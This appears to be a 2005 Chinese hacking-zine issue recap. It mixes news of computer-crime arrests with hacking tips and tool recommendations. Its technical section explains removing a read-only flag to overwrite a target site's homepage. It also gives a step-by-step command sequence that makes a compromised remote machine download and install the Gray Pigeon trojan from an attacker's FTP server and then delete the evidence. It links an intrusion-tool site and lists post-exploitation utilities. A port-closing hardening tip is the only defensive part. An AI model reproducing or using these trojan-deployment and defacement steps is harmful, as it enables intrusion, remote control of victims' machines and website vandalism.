原创-安全之门第七期内容回顾
作者: 苏樱 发布日期: 2005-11-20 查看数: 100 出自: http://www.neteasy.cn
一、新闻部分
“东方微点”副总被刑拘
http://www.sina.com.cn 2005年10月22日14:55 新民晚报
本报讯北京消息:昨天,北京市公安局宣布,北京东方微点信息技术有限责任公司违规操作,致使计算机病毒在互联网上大量传播,严重危害网络安全,该公司副总经理已被警方刑事拘留。专家称,此案在全国尚属首例。
据北京警方调查,该公司自今年一月成立以来,为研制生产防御病毒软件,未经相关部门审核批准,擅自从国家明令屏蔽的、危险度极高的国外病毒网站直接下载大量计算机病毒,并在未采取物理隔绝等安全技术措施的情况下,在与互联网连接的局域网内进行测试、运行,将病毒传播到互联网上,对计算机网络安全造成严重危害,造成某证券公司和某管理顾问有限责任公司直接经济损失几十万元,并对北京某电信公司的正常业务活动造成严重干扰。
北京警方表示,东方微点信息技术有限责任公司违反《计算机信息网络国际联网安全保护管理办法》和《计算机病毒防治管理办法》规定,依照《刑法》有关规定追究相关人员的刑事责任,经北京市检察机关批准,警方对该公司副总经理田亚葵执行逮捕,并将对该公司进行行政处罚。
硕士黑客侵网络内部系统 谎称有漏洞强卖解决方案
一名硕士黑客屡屡入侵上海某知名网络公司,修改了该公司多家客户的软件系统登陆密码,同时扬言该公司产品“存在安全漏洞”,如不支付150万元“安全改进咨询费用”,就在网上泄漏机密。日前,正在深圳一家咖啡厅内上网的这名黑客刘某被警方抓获,浦东新区检察院以涉嫌强迫交易罪对其批准逮捕。
今年31岁的刘某案发前担任深圳某科技公司技术经理。去年12月,刘某在接待一名客户时,被告知他所研发的产品质量不如上海软件公司的同类产品。刘某一听,当即决定和该软件公司“比试”一下。
凭着自己的一技之长,刘某弄到了该公司网络系统安全密码。今年2月,刘某非法入侵这家公司的网络内部系统,对其商务系统进行了长达半年多的偷窥跟踪,一整套复杂的可行性“解决方案”渐渐在刘某的脑海中形成。
刘某打算主动与该公司合作,帮助该公司弥补软件系统安全“漏洞”,“安全改进咨询费”定位在150万元。今年9月,刘某便给上海软件公司老总发来第一封电子邮件,坦言自己发现其公司软件产品存在严重“安全漏洞”,可能导致系统崩溃,甚至获取机密信息,自己对弥补办法颇有心得,愿意提供合作,“交易费”报价150万元。
这位总经理当时根本没把这封邮件当一回事。但后来却一次一次领教到刘某的厉害。今年9月29日,刘某再次恶意访问了受害公司办公软件系统,恶作剧将其公司数个客户登录系统密码更改,导致使用受害公司办公软件系统的客户乱成一团。
接到报案,上海警方很快锁定了在深圳远程作案的刘某,于今年10月10日,在深圳将其抓获。
二、技术部分
1、DOS下修改文件属性:
attrib
这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不行。倒!不过有这个命令就别怕了。 attrib -r index.htm
这个命令是把index.htm的只读属性去掉。
如果把“-”改为“+”则是把这个文件的属性设置为只读。
2、win2000下关闭无用端口
关于win2000下关闭无用端口的方法,我在以前的贴子和我昨天写的共享文件夹安全中都提到过。
在这里供大家参考:
每一项服务都对应相应的端口,比如众如周知的WWW服务的端口是80,smtp是25,ftp是21,win2000安装中默认的都是这些服务开启的。对于个人用户来说确实没有必要,关掉端口也就是关闭无用的服务。
“控制面板”的“管理工具”中的“服务”中来配置。
1、关闭7.9等等端口:关闭Simple TCP/IP Service,支持以下 TCP/IP 服务:Character Generator, Daytime, Discard, Echo, 以及 Quote of the Day。
2、关闭80口:关掉WWW服务。在“服务”中显示名称为"World Wide Web Publishing Service",通过 Internet 信息服务的管理单元提供 Web 连接和管理。
3、关掉25端口:关闭Simple Mail Transport Protocol (SMTP)服务,它提供的功能是跨网传送电子邮件。
4、关掉21端口:关闭FTP Publishing Service,它提供的服务是通过 Internet 信息服务的管理单元提供 FTP 连接和管理。
5、关掉23端口:关闭Telnet服务,它允许远程用户登录到系统并且使用命令行运行控制台程序。
6、还有一个很重要的就是关闭server服务,此服务提供 RPC 支持、文件、打印以及命名管道共享。关掉它就关掉了win2k的默认共享,比如ipc$、c$、admin$等等,此服务关闭不影响您的共他操作。
7、还有一个就是139端口,139端口是NetBIOSSession端口,用来文件和打印共享,注意的是运行samba的unix机器也开放了139端口,功能一样。以前流光2000用来判断对方主机类型不太准确,估计就是139端口开放既认为是NT机,现在好了。
关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性,进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”,打勾就关闭了139端口。
对于个人用户来说,可以在各项服务属性设置中设为“禁用”,以免下次重启服务也重新启动,端口也开放了。
3、在远程主机的cmd下下载某ftp文件
在远程计算机的CMD环境下,如果不能通过IPC$渠道传送文件,那就只有通过FTP下载文件了。
假设我们已经有一个FTP服务器,上面有一个我们配置好的灰鸽子木马文件mhgz.exe,我们应该知道FTP服务器的三个参数:
1、FTP服务器的IP地址:如***.***.***.***
2、FTP服务器的用户名:如tty
3、FTP服务器的密 码:如tty123
在远程计算机的CMD下依次输入下面的命令:
1、echo open ***.***.***.***>>tty.txt 登陆FTP服务器
2、echo tty>>tty.txt 用户名
3、echo tty123>>tty.txt 密码
4、echo bin>>tty.txt 开始
5、echo get mhgz.exe>>tty.txt 下载灰鸽子木马
6、echo bye>>tty.txt 关闭FTP服务器
输入上面命令后,在远程计算机上就会生成一个tty.txt文件,内容为:
open ***.***.***.***
tty
tty123
bin
get mhgz.exe
bye
现在我们在远程计算机上执行下面的命令:
ftp -s:tty.txt 意思是,读取tty.txt里的参数,执行ftp命令,命令执行完后,灰鸽子木马文件mhgz.exe就下载到对方计算机里了。
最后,del c:\tty.txt。
三、推荐
入侵工具:http://3800cc.com/Soft/gjgj/Index.html
灰鸽子清除工具:http://it.rising.com.cn/service/technology/Ravgpk_Download.htm
查看被黑站点:http://www.fanghei.com/html/index/26.htm
上面的站点之所以被黑,肯定是有漏洞,网友可以上去看看自己是否能发现漏洞,如何入侵,再想想如何防御。
经典小工具:
psexec 通过ipc管道直接登录主机
pskill 杀进程高手:)
pslist 列进程高手:)
sid 用sid列用户名
wget 命令行下的http下载软件
whoami 了理自己的权限
TFTPD32 给远方开tftp服务的主机传文件(当然要有个shell)
procexpnt 查看系统进程与端口关联(GUI界面) *
fport 命令行下查看系统进程与端口关联(没有GUI界面的procexpnt强)
psu.exe 用指定进程的权限打开指定的程序
注意:登录任何站点,请小心不要中木马病毒 !
